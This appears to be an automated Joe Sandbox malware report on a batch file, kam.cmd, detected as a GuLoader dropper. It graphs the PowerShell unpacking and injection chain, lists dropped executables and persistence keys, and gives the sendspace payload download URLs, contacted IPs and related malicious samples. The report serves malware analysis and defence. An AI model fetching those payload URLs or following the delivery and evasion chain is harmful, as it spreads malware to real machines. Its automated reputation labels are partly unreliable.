              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Timestomp              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446714 Sample: kam.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 www.sendspace.com 2->40 42 fs13n1.sendspace.com 2->42 44 fs03n4.sendspace.com 2->44 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Yara detected GuLoader 2->62 64 5 other signatures 2->64 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 66 Suspicious powershell command line found 9->66 68 Very long command line found 9->68 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 48 fs03n4.sendspace.com 69.31.136.17, 443, 49705 GTT-BACKBONEGTTDE United States 12->48 50 www.sendspace.com 104.21.28.80, 443, 49704, 49713 CLOUDFLARENETUS United States 12->50 76 Suspicious powershell command line found 12->76 78 Very long command line found 12->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 12->80 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->52 54 Writes to foreign memory regions 18->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 18->56 25 wab.exe 17 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 46 fs13n1.sendspace.com 69.31.136.57, 443, 49714 GTT-BACKBONEGTTDE United States 25->46 32 C:\Windows\svchost.com, PE32 25->32 dropped 34 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 25->34 dropped 36 C:\ProgramData\...\VC_redist.x64.exe, PE32 25->36 dropped 38 149 other malicious files 25->38 dropped 70 Creates an undocumented autostart registry key 25->70 72 Drops executable to a common third party application directory 25->72 74 Infects executable files (exe, dll, sys, html) 25->74 file13 signatures14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              kam.cmd0%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://contoso.com/License0%URL Reputationsafe
              http://tempuri.org/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://java.sun.com0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/ReadSettings0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin0%Avira URL Cloudsafe
              http://stackoverflow.com/a/15123777)0%Avira URL Cloudsafe
              http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/12aciiyl0%Avira URL Cloudsafe
              http://www.computerhope.com/forum/index.php?topic=76293.00%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/i41a76XRll0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              http://www.tutorialspoint.com/javascript/array_map.htm0%Avira URL Cloudsafe
              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%Avira URL Cloudsafe
              http://stackoverflow.com/a/1465386/42241630%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/DisableUser0%Avira URL Cloudsafe
              https://fs03n4.sendspaX0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/GetConfigResponse0%Avira URL Cloudsafe
              https://aka.ms/pscore6lBjq0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R0%Avira URL Cloudsafe
              http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER0%Avira URL Cloudsafe
              https://www.sendspace.com/pr0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/12aciiBl0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com/=60%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/i41a76P0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/12acii0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/i41a760%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/J0%Avira URL Cloudsafe
              http://es5.github.io/#x15.4.4.210%Avira URL Cloudsafe
              https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml0%Avira URL Cloudsafe
              https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/WriteSettings0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/EnableUserResponse0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/DisableUserResponse0%Avira URL Cloudsafe
              http://java.sun.comnot0%Avira URL Cloudsafe
              http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript0%Avira URL Cloudsafe
              https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml0%Avira URL Cloudsafe
              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce0%Avira URL Cloudsafe
              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/GetConfig0%Avira URL Cloudsafe
              http://fs03n4.sendspace.com0%Avira URL Cloudsafe
              http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR0%Avira URL Cloudsafe
              http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/EnableUser0%Avira URL Cloudsafe
              http://stackoverflow.com/questions/1068834/object-comparison-in-javascript0%Avira URL Cloudsafe
              http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse0%Avira URL Cloudsafe
              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim0%Avira URL Cloudsafe
              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com/0%Avira URL Cloudsafe
              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com/Z6:0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs03n4.sendspace.com
              		69.31.136.17
              		truefalse
                		unknown
                www.sendspace.com
                		104.21.28.80
                		truefalse
                  		unknown
                  fs13n1.sendspace.com
                  		69.31.136.57
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.binfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psmfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/12aciifalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/i41a76false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWithjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/12aciiylwab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/i41a76XRllpowershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Serviceofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://stackoverflow.com/a/15123777)jucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/officeappguardwin32.exe.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.computerhope.com/forum/index.php?topic=76293.0jucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n4.sendspace.compowershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/WriteSettingsResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/ReadSettingsofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://stackoverflow.com/a/1465386/4224163jucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.tutorialspoint.com/javascript/array_map.htmjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithnotification_click_helper.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USEROfficeScrSanBroker.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/GetConfigResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/Rofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/DisableUserofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBjqpowershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n4.sendspaXpowershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://es5.github.io/#x15.4.4.21jucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/EnableUserResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWithjucheck.exe.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/12aciiBlwab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/WriteSettingsofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/prwab.exe, 00000009.00000003.2365648701.00000000069CA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filterjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://go.micropowershell.exe, 00000002.00000002.2504527085.0000025059A59000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs13n1.sendspace.com/=6wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/updajucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/i41a76Ppowershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/DisableUserResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://java.sun.comnotjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorwab.exe, 00000009.00000002.2799289733.0000000022290000.00000004.00000010.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sendspace.compowershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://javadl-esd-secure.oracle.com/update/%s/map-%s.xmljucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.compowershell.exe, 00000002.00000002.2504527085.000002505A55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://java.sun.comjucheck.exe.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/Jwab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascriptjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmljucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reducejucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfRofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fs03n4.sendspace.compowershell.exe, 00000002.00000002.2504527085.000002505A59A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/GetConfigofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trimjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://stackoverflow.com/questions/1068834/object-comparison-in-javascriptjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/ReadSettingsResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOfjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/IRoamingSettingsService/EnableUserofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n1.sendspace.com/wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069E2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffnotification_click_helper.exe.9.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n1.sendspace.com/Z6:wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    69.31.136.17
                    		fs03n4.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse
                    104.21.28.80
                    		www.sendspace.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    69.31.136.57
                    		fs13n1.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446714
                    Start date and time:2024-05-23 20:11:53 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 24s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:kam.cmd
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winCMD@14/164@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 77%
                    • Number of executed functions: 49
                    • Number of non-executed functions: 23
                    Cookbook Comments:
                    • Found application associated with file extension: .cmd

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 1716 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5572 because it is empty
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: kam.cmd

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:12:39API Interceptor452x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    69.31.136.17upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                        file.vbsGet hashmaliciousGuLoaderBrowse
                          windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                            windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                              file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                update.vbsGet hashmaliciousGuLoaderBrowse
                                  DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                    JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                                      UGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                                        104.21.28.80upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                          update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                            file.vbsGet hashmaliciousGuLoaderBrowse
                                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                update.vbsGet hashmaliciousGuLoaderBrowse
                                                  69.31.136.57windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                          https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                            #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                                              1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                  QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                                                    QA6433_#002.vbsGet hashmaliciousnjRatBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      fs03n4.sendspace.com1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                      • 69.31.136.17
                                                                      fs13n1.sendspace.comupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.57
                                                                      #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                                                      • 69.31.136.57
                                                                      www.sendspace.comupload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      file.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 172.67.170.105
                                                                      file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 172.67.170.105
                                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      time.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 172.67.170.105
                                                                      https://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                                                      • 172.64.104.11
                                                                      RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.htmlGet hashmaliciousUnknownBrowse
                                                                      • 172.67.161.115

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                                      • 104.21.39.66
                                                                      https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.64.154.146
                                                                      http://all4promos.comGet hashmaliciousUnknownBrowse
                                                                      • 162.247.243.29
                                                                      Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                                      • 172.67.74.152
                                                                      nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 104.26.0.5
                                                                      PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                                                      • 104.26.5.15
                                                                      1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 104.26.5.15
                                                                      N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 172.67.75.166
                                                                      PstCgdvsgB.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 172.67.75.166
                                                                      http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                                      • 104.21.76.205
                                                                      GTT-BACKBONEGTTDEupload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.53
                                                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.53
                                                                      file.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.57
                                                                      file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.57
                                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.57
                                                                      time.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.53
                                                                      http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                                      • 69.167.127.106
                                                                      http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                                      • 69.167.127.106
                                                                      GTT-BACKBONEGTTDEupload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.53
                                                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.53
